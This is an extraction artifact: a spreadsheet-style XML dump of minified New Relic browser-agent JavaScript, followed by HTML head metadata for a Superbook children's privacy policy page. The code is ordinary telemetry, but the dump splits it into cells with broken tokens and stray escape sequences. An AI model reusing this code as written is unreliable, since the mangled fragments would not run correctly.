0,jserrors:{enabled:!0,harvestTimeSeconds:10},metrics:{enabled:!0},page_action:{enabled:!0,harvestTimeSeconds:30},page_view_event:{enabled:!0},page_view_timing:{enabled:!0,harvestTimeSeconds:30,long_task:!1},session_trace:{enabled:!0,harvestTimeSeconds:10},spa:{enabled:!0,harvestTimeSeconds:10}},g={};function v(e){if(!e)throw new Error("All configuration objects require an agent identifier!");if(!g[e])throw new Error("Configuration for ".concat(e," was never set"));return g[e]}function h(e,t){if(!e)throw new Error("All configuration objects require an agent identifier!");g[e]=new s(t,l),(0,i.Qy)(e,g[e],"config")}function p(e,t){if(!e)throw new Error("All configuration objects require an agent identifier!");var r=v(e);if(r){for(var n=t.split(".</t>
  </si>
  <si>
    <t>"),i=0;i&lt;n.length-1;i++)if("object"!=typeof(r=r[n[i]]))return;r=r[n[n.length-1]]}return r}const m={accountID:void 0,trustKey:void 0,agentID:void 0,licenseKey:void 0,applicationID:void 0,xpid:void 0},b={};function w(e){if(!e)throw new Error("All loader-config objects require an agent identifier!");if(!b[e])throw new Error("LoaderConfig for ".concat(e," was never set"));return b[e]}function y(e,t){if(!e)throw new Error("All loader-config objects require an agent identifier!");b[e]=new s(t,m),(0,i.Qy)(e,b[e],"loader_config")}const A=(0,i.mF)().o;var x =null,j=null;const _=/Version\/(\S+)\s+Safari/;if(navigator.userAgent){var E=navigator.userAgent,D=E.match(_);D&amp;&amp;-1===E.indexOf("Chrome")&amp;&amp;-1===E.indexOf("Chromium")&amp;&amp;(x="Safari",j=D[1])}function k(e,t){if(!x)return!1;if(e!==x)return!1;if(!t)return!0;if(!j)return!1;for(var r=j.split(". "),n=t.split(".</t>
  </si>
  <si>
    <t>"),i=0;i&lt;n.length;i++)if(n[i]!==r[i])return!1;return!0}var S=r(5526),P=r(2374);const T="NRBA_SESSION_ID";function N(){if(!P.il)return null;try{let e;return null===(e=window.sessionStorage.getItem(T))&amp;&amp;(e=(0,S.ky)(16),window.sessionStorage.setItem(T,e)),e}catch(e){return null}}var O =r(8226);const I=e=&gt;({buildEnv:O.Re,customTransaction:void 0,disabled:!1,distMethod:O.gF,isolatedBacklog:!1,loaderType:void 0,maxBytes:3e4,offset:Math.floor(P._A?.performance?.timeOrigin||P._A?.performance?.timing?.navigationStart||Date.now()),onerror:void 0,origin:""+P._A.location,ptid:void 0,releaseIds:{},sessionId:1==p(e,"privacy.cookies_enabled")?N():null,xhrWrappable:"function"==typeof P._A.XMLHttpRequest?.prototype?.addEventListener,userAgent:n,version:O.q4}),C={};function R(e){if(!e)throw new Error("All runtime objects require an agent identifier!");if(!C[e])throw new Error("Runtime for ".concat(e," was never set"));return C[e]}function M(e,t){if(!e)throw new Error("All runtime objects require an agent identifier!");C[e]=new s(t,I(e)),(0,i.Qy)(e,C[e],"runtime")}function z(e){return function(e){try{const t=d(e);return!!t.licenseKey&amp;&amp;!!t.errorBeacon&amp;&amp;!!t.applicationID}catch(e){return!1}}(e)}},8226:(e,t,r)=&gt;{"use strict";r.d(t,{Re:()=&gt;i,gF:()=&gt;o,q4:()=&gt;n});const n="1.229.0",i="PROD",o="CDN"},9557:(e,t,r)=&gt;{"use strict";r.d(t,{w:()=&gt;o});var n=r(8610);const i={agentIdentifier:""};class o{constructor(e){try{if("object"!=typeof e)return(0,n. Z)("shared context requires an object as input");this.sharedContext={},Object.assign(this.sharedContext,i),Object.entries(e).forEach((e=&gt;{let[t,r]=e;Object.keys(i).includes(t)&amp;&amp;(this.sharedContext[t]=r)}))}catch(e){(0,n.Z)("An error occured while setting SharedContext",e)}}}},4329:(e,t,r)=&gt;{"use strict";r.d(t,{L:()=&gt;d,R:()=&gt;c});var n=r(3752),i=r(7022),o=r(4045),a=r(2325);const s={};function c(e,t){const r={staged:!1,priority:a.p[t]||0};u(e),s[e].get(t)||s[e].set(t,r)}function u(e){e&amp;&amp;(s[e]||(s[e]=new Map))}function d(){let e=arguments.length&gt;0&amp;&amp;void 0!==arguments[0]?arguments[0]:"",t=arguments.length&gt;1&amp;&amp;void 0!==arguments[1]?arguments[1]:"feature";if(u(e),!e||!s[e].get(t))return a(t);s[e].get(t).staged=!0;const r=Array.from(s[e]);function a(t){const r=e?n.ee.get(e):n.ee,a=o.X.handlers;if(r.backlog&amp;&amp;a){var s</t>
  </si>
  <si>
    <t>D)(t[r],(function(t,r){var n=e[0];if(r[0]===n){var i=r[1],o=e[3],a=e[2];i.apply(o,a)}}))}},3752:(e,t,r)=&gt;{"use strict";r.d(t,{ee:()=&gt;u});var n=r(6797),i=r(3916),o=r(7022),a=r(6562),s="nr@context";let c=(0,n.fP)();var u;function d(){}function f(){return new d}function l(){u.aborted=!0,u.backlog={}}c.ee?u=c.ee:(u=function e(t,r){var n={},c={},g={},v=!1;try{v=16===r.length&amp;&amp;(0,a. OP)(r).isolatedBacklog}catch(e){}var h={on:b,addEventListener:b,removeEventListener:w,emit:m,get:A,listeners:y,context:p,buffer:x,abort:l,aborted:!1,isBuffering:j,debugId:r,backlog:v?{}:t&amp;&amp;"object"==typeof t.backlog?t.backlog:{}};return h;function p(e){return e&amp;&amp;e instanceof d?e:e?(0,i. X)(e,s,f):f()}function m(e,r,n,i,o){if(!1!==o&amp;&amp;(o=!0),!u.aborted||i){t&amp;&amp;o&amp;&amp;t.emit(e,r,n);for(var a=p(n),s=y(e),d=s.length,f=0;f&lt;d;f++)s[f].apply(a,r);var l=_()[c[e]];return l&amp;&amp;l.push([h,e,r,a]),a}}function b(e,t){n[e]=y(e).concat(t)}function w(e,t){var r=n[e];if(r)for(var i=0;i&lt;r.length;i++)r[i]===t&amp;&amp;r.splice(i,1)}function y(e){return n[e]||[]}function A(t){return g[t]=g[t]||e(h,t)}function x(e,t){var r=_();h.aborted||(0,o.</t>
  </si>
  <si>
    <t>D)(e,(function(e,n){t=t||"feature",c[n]=t,t in r||(r[t]=[])}))}function j(e){return!!_()[c[e]]}function _(){return h.backlog}}(void 0,"globalEE"),c.ee=u)},9252:(e,t,r)=&gt;{"use strict";r.d(t,{E:()=&gt;n,p:()=&gt;i});var n=r(3752).ee.get("handle");function i(e,t,r,i,o){o?(o.buffer([e],i),o.emit(e,t,r)):(n.buffer([e],i),n.emit(e,t,r))}},4045:(e,t,r)=&gt;{"use strict";r.d(t,{X:()=&gt;o});var n=r(9252);o.on=a;var i=o.handlers={};function o(e,t,r,o){a(o||n. E,i,e,t,r)}function a(e,t,r,i,o){o||(o="feature"),e||(e=n.E);var a=t[o]=t[o]||{};(a[r]=a[r]||[]).push([e,i])}},8544:(e,t,r)=&gt;{"use strict";r.d(t,{bP:()=&gt;s,iz:()=&gt;c,m$:()=&gt;a});var n=r(2374);let i=!1,o=!1;try{const e={get passive(){return i=!0,!1},get signal(){return o=!0,!1}};n._A.addEventListener("test",null,e),n._A.removeEventListener("test",null,e)}catch(e){}function a(e,t){return i||o?{capture:!!e,passive:i,signal:t}:!!e}function s(e,t){let r=arguments.length&gt;2&amp;&amp;void 0!==arguments[2]&amp;&amp;arguments[2];window.addEventListener(e,t,a(r))}function c(e,t){let r=arguments.length&gt;2&amp;&amp;void 0!==arguments[2]&amp;&amp;arguments[2];document.addEventListener(e,t,a(r))}},5526:(e,t,r)=&gt;{"use strict";r.d(t,{Rl:()=&gt;i,ky:()=&gt;o});var n=r(2374);function i(){var e=null,t=0,r=n._A?.crypto||n._A?.msCrypto;function i(){return e?15&amp;e[t++]:16*Math.random()|0}r&amp;&amp;r.getRandomValues&amp;&amp;(e=r.getRandomValues(new Uint8Array(31)));for(var o,a="xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx",s="",c=0;c&lt;a.length;c++)s+="x"===(o=a[c])?i().toString(16):"y"===o?(o=3&amp;i()|8).toString(16):o;return s}function o(e){var t=null,r=0,n=self.crypto||self.msCrypto;n&amp;&amp;n.getRandomValues&amp;&amp;Uint8Array&amp;&amp;(t=n.getRandomValues(new Uint8Array(31)));for(var i=[],o=0;o&lt;e;o++)i.push(a().toString(16));return i.join("");function a(){return t?15&amp;t[r++]:16*Math.random()|0}}},2053:(e,t,r)=&gt;{"use strict";function n(){return Math.round(performance.now())}r.d(t,{z:()=&gt;n})},8610:(e,t,r)=&gt;{"use strict";function n(e,t){console&amp;&amp;console.warn&amp;&amp;"function"==typeof console.warn&amp;&amp;(console.warn("New Relic: ".concat(e)),t&amp;&amp;console.warn(t))}r.d(t,{Z:()=&gt;n})},3916:(e,t,r)=&gt;{"use strict";r.d(t,{X:()=&gt;i});var n=Object.prototype.hasOwnProperty;function i(e,t,r){if(n.call(e,t))return e[t];var i=r();if(Object.defineProperty&amp;&amp;Object.keys)try{return Object.defineProperty(e,t,{value:i,writable:!0,enumerable:!1}),i}catch(e){}return e[t]=i,i}},2374:(e,t,r)=&gt;{"use strict";r.d(t,{_A:()=&gt;o,il:()=&gt;n,lW:()=&gt;a,v6:()=&gt;i});const n=Boolean("undefined"!=typeof window&amp;&amp;window.document),i=Boolean("undefined"!=typeof WorkerGlobalScope&amp;&amp;self.navigator instanceof WorkerNavigator);let o=(()=&gt;{if(n)return window;if(i){if("undefined"!=typeof globalThis&amp;&amp;globalThis instanceof WorkerGlobalScope)return globalThis;if(self instanceof WorkerGlobalScope)return self}throw new Error('New Relic browser agent shutting down due to error:</t>
  </si>
  <si>
    <t>a(){return o}},7022:(e,t,r)=&gt;{"use strict";r.d(t,{D:()=&gt;i});var n=Object.prototype.hasOwnProperty;function i(e,t){var r=[],i="",o=0;for(i in e)n.call(e,i)&amp;&amp;(r[o]=t(i,e[i]),o+=1);return r}},2438:(e,t,r)=&gt;{"use strict";r.d(t,{P:()=&gt;o});var n=r(3752);const i=()=&gt;{const e=new WeakSet;return(t,r)=&gt;{if("object"==typeof r&amp;&amp;null!==r){if(e.has(r))return;e.add(r)}return r}};function o(e){try{return JSON.stringify(e,i())}catch(e){try{n.ee.emit("internal-error",[e])}catch(e){}}}},2650:(e,t,r)=&gt;{"use strict";r.d(t,{K:()=&gt;a,b:()=&gt;o});var n=r(8544);function i(){return"undefined"==typeof document||"complete"===document.readyState}function o(e,t){if(i())return e();(0,n.bP)("load",e,t)}function a(e){if(i())return e();(0,n.iz)("DOMContentLoaded",e)}},6797:(e,t,r)=&gt;{"use strict";r.d(t,{EZ:()=&gt;u,Qy:()=&gt;c,ce:()=&gt;o,fP:()=&gt;a,gG:()=&gt;d,mF:()=&gt;s});var n=r(2053),i=r(2374);const o={beacon:"bam.nr-data.net",errorBeacon:"bam.nr-data.net"};function a(){return i._A.NREUM||(i._A.NREUM={}),void 0===i._A.newrelic&amp;&amp;(i._A.newrelic=i._A.NREUM),i._A.NREUM}function s(){let e=a();return e.o||(e.o={ST:i._A.setTimeout,SI:i._A.setImmediate,CT:i._A.clearTimeout,XHR:i._A.XMLHttpRequest,REQ:i._A.Request,EV:i._A.Event,PR:i._A.Promise,MO:i._A.MutationObserver,FETCH:i._A.fetch}),e}function c(e,t,r){let i=a();const o=i.initializedAgents||{},s=o[e]||{};return Object.keys(s).length||(s.initializedAt={ms:(0,n.z)(),date:new Date}),i.initializedAgents={...o,[e]:{...s,[r]:t}},i}function u(e,t){a()[e]=t}function d(){return function(){let e=a();const t=e.info||{};e.info={beacon:o.beacon,errorBeacon:o.errorBeacon,...t}}(),function(){let e=a();const t=e.init||{};e.init={...t}}(),s(),function(){let e=a();const t=e.loader_config||{};e.loader_config={...t}}(),a()}},6998:(e,t,r)=&gt;{"use strict";r.d(t,{N:()=&gt;i});var n=r(8544);function i(e){let t=arguments.length&gt;1&amp;&amp;void 0!==arguments[1]&amp;&amp;arguments[1];return void(0,n.iz)("visibilitychange",(function(){if(t){if("hidden"!=document.visibilityState)return;e()}e(document.visibilityState)}))}},6034:(e,t,r)=&gt;{"use strict";r.d(t,{gF:()=&gt;o,mY:()=&gt;i,t9:()=&gt;n,vz:()=&gt;s,xS:()=&gt;a});const n=r(2325).D.metrics,i="sm",o="cm",a="storeSupportabilityMetrics",s="storeEventMetrics"},2484:(e,t,r)=&gt;{"use strict";r.d(t,{Dz:()=&gt;i,OJ:()=&gt;a,qw:()=&gt;o,t9:()=&gt;n});const n=r(2325).D.pageViewEvent,i="firstbyte",o="domcontent",a="windowload"},6382:(e,t,r)=&gt;{"use strict";r.d(t,{t:()=&gt;n});const n=r(2325).D.pageViewTiming},1509:(e,t,r)=&gt;{"use strict";r.d(t,{W:()=&gt;s});var n=r(6562),i=r(3752),o=r(5432),a=r(6797);class s{constructor(e,t,r){this.agentIdentifier=e,this.aggregator=t,this.ee=i.ee.get(e,(0,n. OP)(this.agentIdentifier).isolatedBacklog),this.featureName=r,this.blocked=!1,this.checkConfiguration()}checkConfiguration(){if(!(0,n.lF)(this.agentIdentifier)){let e={...(0,a.gG)().info?.jsAttributes};try{e={...e,...(0,n.</t>
  </si>
  <si>
    <t>C5)(this.agentIdentifier)?.jsAttributes}}catch(e){}(0,o.j)(this.agentIdentifier,{...(0,a.gG)(),info:{...(0,a.gG)().info,jsAttributes:e}})}}}},5432:(e,t,r)=&gt;{"use strict";r.d(t,{j:()=&gt;y});var n=r(8683),i=r.n(n),o=r(2325),a=r(6562),s=r(9252),c=r(7022),u=r(3752),d=r(2053),f=r(4329),l=r(2650),g=r(2374),v=r(8610),h=r(6034);var p=r(6797);const m={stn:[o. D.sessionTrace],err:[o.D.jserrors,o.D.metrics],ins:[o. D.pageAction],spa:[o.</t>
  </si>
  <si>
    <t>D.spa]};const b={};function w(){const e=(0,p.gG)();["setErrorHandler","finished","addToTrace","inlineHit","addRelease","addPageAction","setCurrentRouteName","setPageViewName","setCustomAttribute","interaction","noticeError"].forEach((t=&gt;{e[t]=function(){for(var r=arguments.length,n=new Array(r),i=0;i&lt;r;i++)n[i]=arguments[i];return function(t){for(var r=arguments.length,n=new Array(r&gt;1?r-1:0),i=1;i&lt;r;i++)n[i-1]=arguments[i];let o=[];return Object.values(e.initializedAgents).forEach((e=&gt;{e.exposed&amp;&amp;e.api[t]&amp;&amp;o.push(e.api[t](...n))})),o.length&gt;1?returnsVals:o[0]}(t,...n)}}))}function y(e){let t=arguments.length&gt;1&amp;&amp;void 0!==arguments[1]?arguments[1]:{},n=arguments.length&gt;2?arguments[2]:void 0,y=arguments.length&gt;3?arguments[3]:void 0,{init: A,info:x,loader_config:j,runtime:_={loaderType:n},exposed:E=!0}=t;const D=(0,p.gG)();x||(A=D.init,x=D.info,j=D.loader_config),g.v6&amp;&amp;(x.jsAttributes={...x.jsAttributes,isWorker:!0}),(0,a. CX)(e,x),(0,a.</t>
  </si>
  <si>
    <t>Dg)(e,A||{}),(0,a. GE)(e,j||{}),(0,a.sU)(e,_),w();const k=function(e,t){t||(0,f. R)(e,"api");const n={};var p=u.ee.get(e),m=p.get("tracer"),b="api-",w=b+"ixn-";function y(){}(0,c.</t>
  </si>
  <si>
    <t>D)(["setErrorHandler","finished","addToTrace","inlineHit","addRelease"],(function(e,t){n[t]=x(b,t,!0,"api")})),n.addPageAction=x(b,"addPageAction",!0,o. D.pageAction),n.setCurrentRouteName=x(b,"routeName",!0,o. D.spa),n.setPageViewName=function(t,r){if("string"==typeof t)return"/"!==t.charAt(0)&amp;&amp;(t="/"+t),(0,a.</t>
  </si>
  <si>
    <t>OP)(e).customTransaction=(r||"http://custom.transaction")+t,x(b,"setPageViewName",!0,"api")()},n.setCustomAttribute=function(t,r){const n=(0,a.C5)(e);return(0,a. CX)(e,{...n,jsAttributes:{...n.jsAttributes,[t]:r}}),x(b,"setCustomAttribute",!0,"api")()},n.interaction=function(){return(new y).get()};var A=y.prototype={createTracer:function(e,t){var r={},n=this,i="function"==typeof t;return(0,s.p)(w+"tracer",[(0,d.z)(),e,r],n,o.D.spa,p),function(){if(m.emit((i?"":"no-")+"fn-start",[(0,d.z)(),n,i],r),i)try{return t.apply(this,arguments)}catch(e){throw m.emit("fn-err",[arguments,this,"string"==typeof e?new Error(e):e],r),e}finally{m.emit("fn-end",[(0,d.z)()],r)}}}};function x(e,t,r,n){return function(){return(0,s.p)(h.xS,["API/"+t+"/called"],void 0,o.</t>
  </si>
  <si>
    <t>D.metrics,p),(0,s.p)(e+t,[(0,d.z)()].concat(i()(arguments)),r?null:this,n,p),r?void 0:this}}function j(){r.e(439).then(r.bind(r,5692)).then((t=&gt;{let{setAPI:r}=t;r(e),(0,f. L)(e,"api")})).catch((()=&gt;(0,v. Z)("Downloading runtime APIs failed...")))}return(0,c.</t>
  </si>
  <si>
    <t>D)("actionText,setName,setAttribute,save,ignore,onEnd,getContext,end,get".split(","),(function(e,t){A[t]=x(w,t,void 0,o. D.spa)})),n.noticeError=function(e,t){"string"==typeof e&amp;&amp;(e=new Error(e)),(0,s.p)(h.xS,["API/noticeError/called"],void 0,o. D.metrics,p),(0,s.p)("err",[e,(0,d.z)(),!1,t],void 0,o.</t>
  </si>
  <si>
    <t>D.jserrors,p)},g.v6?j():(0,l.b)((()=&gt;j()),!0),n}(e,y);return(0,p.Qy)(e,k,"api"),(0,p.Qy)(e,E,"exposed"),(0,p.EZ)("activatedFeatures",b),(0,p.EZ)("setToken",(t=&gt;function(e,t){var r=u.ee.get(t);e&amp;&amp;"object"==typeof e&amp;&amp;((0,c. D)(e,(function(e,t){if(!t)return(m[e]||[]).forEach((t=&gt;{(0,s.p)("block-"+e,[],void 0,t,r)}));b[e]||((0,s.p)("feat-"+e,[],void 0,m[e],r),b[e]=!0)})),(0,f. L)(t,o.D.pageViewEvent))}(t,e))),k}},909:(e,t,r)=&gt;{"use strict";r.d(t,{Z:()=&gt;i,q:()=&gt;o});var n=r(2325);function i(e){switch(e){case n.D.ajax:return[n.</t>
  </si>
  <si>
    <t>D.jserrors];case n.D.sessionTrace:return[n. D.ajax,n.D.pageViewEvent];case n. D.pageViewTiming:return[n.</t>
  </si>
  <si>
    <t>D.pageViewEvent];default: return[]}}function o(e){return e===n. D.jserrors?[]:["auto"]}},2325:(e,t,r)=&gt;{"use strict";r.d(t,{D:()=&gt;n,p:()=&gt;i});const n={ajax:"ajax",jserrors:"jserrors",metrics:"metrics",pageAction:"page_action",pageViewEvent:"page_view_event",pageViewTiming:"page_view_timing",sessionTrace:"session_trace",spa:"spa"},i={[n.pageViewEvent]:1,[n.pageViewTiming]:2,[n.metrics]:3,[n.jserrors]:4,[n.ajax]:5,[n.sessionTrace]:6,[n.pageAction]:7,[n.spa]:8}},8683:e=&gt;{e.exports=function(e,t,r){t||(t=0),void 0===r&amp;&amp;(r=e?e.length:0);for(var n=-1,i=r-t||0,o=Array(i&lt;0?0:</t>
  </si>
  <si>
    <t>i);++n&lt;i;)o[n]=e[t+n];return o}}},n={};function i(e){var t=n[e];if(void 0!==t)return t.exports;var o=n[e]={exports:{}};return r[e](o,o.exports,i),o.exports}i.m=r,i.n=e=&gt;{var t=e&amp;&amp;e.__esModule?()=&gt;e.default:()=&gt;e;return i.d(t,{a:t}),t},i.d=(e,t)=&gt;{for(var r in t)i.o(t,r)&amp;&amp;!i.o(e,r)&amp;&amp;Object.defineProperty(e,r,{enumerable:!0,get:t[r]})},i.f={},i.e=e=&gt;Promise.all(Object.keys(i.f).reduce(((t,r)=&gt;(i.f[r](e,t),t)),[])),i.u=e=&gt;(({78:"page_action-aggregate",147:"metrics-aggregate",193:"session_trace-aggregate",317:"jserrors-aggregate",348:"page_view_timing-aggregate",439:"async-api",729:"lazy-loader",786:"page_view_event-aggregate",873:"spa-aggregate",898:"ajax-aggregate"}[e]||e)+". "+{78:"8658345c",147:"fde0a6c6",193:"afe7d95b",317:"265ba41e",348:"92e7c907",439:"71768fc8",729:"ff971c03",786:"a968183b",862:"5040a0e9",873:"6a952689",898:"ebcbd305"}[e]+"-1.229.0.min.js"),i.o=(e,t)=&gt;Object.prototype.hasOwnProperty.call(e,t),e={},t="NRBA:",i.l=(r,n,o,a)=&gt;{if(e[r])e[r].push(n);else{var s,c;if(void 0!==o)for(var u=document.getElementsByTagName("script"),d=0;d&lt;u.length;d++){var f</t>
  </si>
  <si>
    <t>Z)("Downloading ".concat(this.featureName," failed...")),this.abortHandler?.()}};g.v6?e():(0,l.b)((()=&gt;e()),!0)}}var p,m,b,w=i(2484),y=i(2053);class A extends h{constructor(r,n){let i=!(arguments.length&gt;2&amp;&amp;void 0!==arguments[2])||arguments[2];if(super(r,n,w.t9,i),("undefined"==typeof PerformanceNavigationTiming||u. T)&amp;&amp;"undefined"!=typeof PerformanceTiming){const n=(0,t.OP)(r);n[w.</t>
  </si>
  <si>
    <t>Dz]=Math.max(Date.now()-n.offset,0),(0,l. K)((()=&gt;n[w.qw]=Math.max((0,y.z)()-n[w. Dz],0))),(0,l.b)((()=&gt;{const t=(0,y.z)();n[w.</t>
  </si>
  <si>
    <t>OJ]=Math.max(t-n[w. Dz],0),(0,c.p)("timing",["load",t],void 0,e. D.pageViewTiming,this.ee)}))}this.importAggregator()}}p=A,m="featureName",b=w.t9,(m=function(e){var t=function(e,t){if("object"!=typeof e||null===e)return e;var r=e[Symbol.toPrimitive];if(void 0!==r){var n=r.call(e,t||"default");if("object"!=typeof n)return n;throw new TypeError("@@toPrimitive must return a primitive value.</t>
  </si>
  <si>
    <t>")}return("string"===t?String:Number)(e)}(e,"string");return"symbol"==typeof t?t:String(t)}(m))in p?Object.defineProperty(p,m,{value:b,enumerable:!0,configurable:!0,writable:!0}):p[m]=b;var x=i(9557),j=i(7022);class _ extends x.w{constructor(e){super(e),this.aggregatedData={}}store(e,t,r,n,i){var o=this.getBucket(e,t,r,i);return o.metrics=function(e,t){t||(t={count:0});return t.count+=1,(0,j. D)(e,(function(e,r){t[e]=E(r,t[e])})),t}(n,o.metrics),o}merge(e,t,r,n,i){var o=this.getBucket(e,t,n,i);if(o.metrics){var a=o.metrics;a.count+=r.count,(0,j. D)(r,(function(e,t){if("count"!==e){var n=a[e],i=r[e];i&amp;&amp;!i.c?a[e]=E(i.t,n):a[e]=function(e,t){if(!t)return e;t.c||(t=D(t.t));return t.min=Math.min(e.min,t.min),t.max=Math.max(e.max,t.max),t.t+=e.t,t.sos+=e.sos,t.c+=e.c,t}(i,a[e])}}))}else o.metrics=r}storeMetric(e,t,r,n){var i=this.getBucket(e,t,r);return i.stats=E(n,i.stats),i}getBucket(e,t,r,n){this.aggregatedData[e]||(this.aggregatedData[e]={});var i=this.aggregatedData[e][t];return i||(i=this.aggregatedData[e][t]={params:r||{}},n&amp;&amp;(i.custom=n)),i}get(e,t){return t?this.aggregatedData[e]&amp;&amp;this.aggregatedData[e][t]:this.aggregatedData[e]}take(e){for(var t={},r="",n=!1,i=0;i&lt;e.length;i++)t[r=e[i]]=k(this.aggregatedData[r]),t[r].length&amp;&amp;(n=!0),delete this.aggregatedData[r];return n?t:null}}function E(e,t){return null==e?function(e){e?e.c++:e={c:1};return e}(t):t?(t.c||(t=D(t.t)),t.c+=1,t.t+=e,t.sos+=e*e,e&gt;t.max&amp;&amp;(t.max=e),e&lt;t.min&amp;&amp;(t.min=e),t):{t:e}}function D(e){return{t:e,min:e,max:e,sos:e*e,c:1}}function k(e){return"object"!=typeof e?[]:(0,j.</t>
  </si>
  <si>
    <t>D)(e,S)}function S(e,t){return t}var P=i(6797),T=i(5526),N=i(2438);var O=i(6998),I=i(8544),C=i(6382);class R extends h{constructor(e,r){let n=!(arguments.length&gt;2&amp;&amp;void 0!==arguments[2])||arguments[2];super(e,r,C.t,n),g.il&amp;&amp;((0,t. OP)(e).initHidden=Boolean("hidden"===document.visibilityState),(0,O.N)((()=&gt;(0,c.p)("docHidden",[(0,y.z)()],void 0,C.t,this.ee)),!0),(0,I.bP)("pagehide",(()=&gt;(0,c.p)("winPagehide",[(0,y.z)()],void 0,C.t,this.ee))),this.importAggregator())}}!function(e,t,r){(t=function(e){var t=function(e,t){if("object"!=typeof e||null===e)return e;var r=e[Symbol.toPrimitive];if(void 0!==r){var n=r.call(e,t||"default");if("object"!=typeof n)return n;throw new TypeError("@@toPrimitive must return a primitive value. ")}return("string"===t?String:Number)(e)}(e,"string");return"symbol"==typeof t?t:String(t)}(t))in e?Object.defineProperty(e,t,{value:r,enumerable:!0,configurable:!0,writable:!0}):e[t]=r}(R,"featureName",C.t);const M=Boolean(g._A?.Worker),z=Boolean(g._A?.SharedWorker),B=Boolean(g._A?.navigator?.serviceWorker);let q,W,V;var L=i(6034);class Z extends h{constructor(t,r){let n=!(arguments.length&gt;2&amp;&amp;void 0!==arguments[2])||arguments[2];super(t,r,L.t9,n),function(e){if(!q){if(M){q=Worker;try{g._A.Worker=r(q,"Dedicated")}catch(e){o(e,"Dedicated")}if(z){W=SharedWorker;try{g._A.SharedWorker=r(W,"Shared")}catch(e){o(e,"Shared")}}else n("Shared");if(B){V=navigator.serviceWorker.register;try{g._A.navigator.serviceWorker.register=(t=V,function(){for(var e=arguments.length,r=new Array(e),n=0;n&lt;e;n++)r[n]=arguments[n];return i("Service",r[1]?.type),t.apply(navigator.serviceWorker,r)})}catch(e){o(e,"Service")}}else n("Service");var t;return}n("All")}function r(e,t){return"undefined"==typeof Proxy?e:new Proxy(e,{construct:(e,r)=&gt;(i(t,r[1]?.type),new e(...r))})}function n(t){g.v6||e("Workers/".concat(t,"/Unavailable"))}function i(t,r){e("Workers/".concat(t,"module"===r?"/Module":"/Classic"))}function o(t,r){e("Workers/".concat(r,"/SM/Unsupported")),(0,v.</t>
  </si>
  <si>
    <t>Z)("NR Agent: Unable to capture ".concat(r," workers. "),t)}}((t=&gt;(0,c.p)(L.xS,[t],void 0,e.</t>
  </si>
  <si>
    <t>D.metrics,this.ee))),this.importAggregator()}}!function(e,t,r){(t=function(e){var t=function(e,t){if("object"!=typeof e||null===e)return e;var r=e[Symbol.toPrimitive];if(void 0!==r){var n=r.call(e,t||"default");if("object"!=typeof n)return n;throw new TypeError("@@toPrimitive must return a primitive value. ")}return("string"===t?String:Number)(e)}(e,"string");return"symbol"==typeof t?t:String(t)}(t))in e?Object.defineProperty(e,t,{value:r,enumerable:!0,configurable:!0,writable:!0}):e[t]=r}(Z,"featureName",L.t9),new class{constructor(e){let t=arguments.length&gt;1&amp;&amp;void 0!==arguments[1]?arguments[1]:(0,T.ky)(16);this.agentIdentifier=t,this.sharedAggregator=new _({agentIdentifier:this.agentIdentifier}),this.features={},this.desiredFeatures=new Set(e.features||[]),this.desiredFeatures.add(A),Object.assign(this,(0,a.j)(this.agentIdentifier,e,e.loaderType||"agent")),this.start()}get config(){return{info:(0,t. C5)(this.agentIdentifier),init:(0,t.</t>
  </si>
  <si>
    <t>P_)(this.agentIdentifier),loader_config:(0,t. DL)(this.agentIdentifier),runtime:(0,t. OP)(this.agentIdentifier)}}start(){const t="features";try{const r=n(this.agentIdentifier),i=Array.from(this.desiredFeatures);i.sort(((t,r)=&gt;e.p[t.featureName]-e.p[r.featureName])),i.forEach((t=&gt;{if(r[t.featureName]||t.featureName===e.D.pageViewEvent){const</t>
  </si>
  <si>
    <t>e=(0,s.Z)(t.featureName);e.every((e=&gt;r[e]))||(0,v. Z)("".concat(t.featureName," is enabled but one or more dependent features has been disabled (").concat((0,N.P)(e),"). This may cause unintended consequences or missing data...")),this.features[t.featureName]=new t(this.agentIdentifier,this.sharedAggregator)}})),(0,P.Qy)(this.agentIdentifier,this.features,t)}catch(e){(0,v.Z)("Failed to initialize all enabled instrument classes (agent aborted)</t>
  </si>
  <si>
    <t xml:space="preserve">-",e);for(const e in this.features)this.features[e].abortHandler?.();const r=(0,P.fP)();return delete r.initializedAgents[this.agentIdentifier]?.api,delete r.initializedAgents[this.agentIdentifier]?.[t],delete this.sharedAggregator,r.ee?.abort(),delete r.ee?.get(this.agentIdentifier),!1}}}({features:[A,R,Z],loaderType:"lite"})})(),window.NRBA=o})();&lt;/script&gt;_x005F_x000D_
		&lt;meta charset="UTF-8"&gt;_x005F_x000D_
		&lt;title&gt;Superbook Privacy Policy - Protecting Your Privacy&lt;/title&gt;_x005F_x000D_
		&lt;meta name="author" content="CBN, Inc."&gt;_x005F_x000D_
		&lt;meta name="description" content="This Kids' Privacy Policy supplements CBN's Privacy Policy by providing additional privacy measures for children who visit the Superbook Kids website in compliance with the Children's Online Privacy Protection Act (COPPA)."&gt;_x005F_x000D_
		&lt;meta name='rating' content='Safe For Kids'&gt;_x005F_x000D_
_x005F_x000D_
		&lt;meta name="apple-itunes-app" content="app-id=606378030"&gt;_x005F_x000D_
		&lt;meta name="google-play-app" content="app-id=https://play.google.com/store/apps/details?id=air.cbn.superbook.bible.app.android&amp;#38;referrer=utm_source%3DSuperbookTV%26utm_medium%3Dsmart_banner%26utm_campaign%3DSuperbookBibleApp"&gt;_x005F_x000D_
		&lt;meta name="keywords" content="Superbook Privacy Policy,COPPA,Parental Consent,Collected Information,Information Disclosed,Parental Access,Contact Information,Privacy Policy"&gt;_x005F_x000D_
		&lt;meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1"&gt;_x005F_x000D_
		_x005F_x000D_
		&lt;link rel="image_src" href="https://cdn.superbook.cbn.com/sites/default/files/PP_FB_Ref_Image.png"&gt;_x005F_x000D_
		&lt;link rel="apple-touch-icon" href="https://cdn.superbook.cbn.com/sites/all/themes/custom/superbook/images/content/mobile_app_small_ico.jpg"&gt;_x005F_x000D_
		&lt;link rel="shortcut icon" href="/favicon.ico"&gt;_x005F_x000D_
		_ x000D_
		&lt;meta property="og:title" content="Superbook Privacy Policy - Protecting Your Privacy"&gt;_x005F_x000D_
		&lt;meta property="og:site_name" content="Superbook"&gt;_x005F_x000D_
		&lt;meta property="og:url" content="http://us-en.superbook.cbn.com/privacypolicy"&gt;_x005F_x000D_
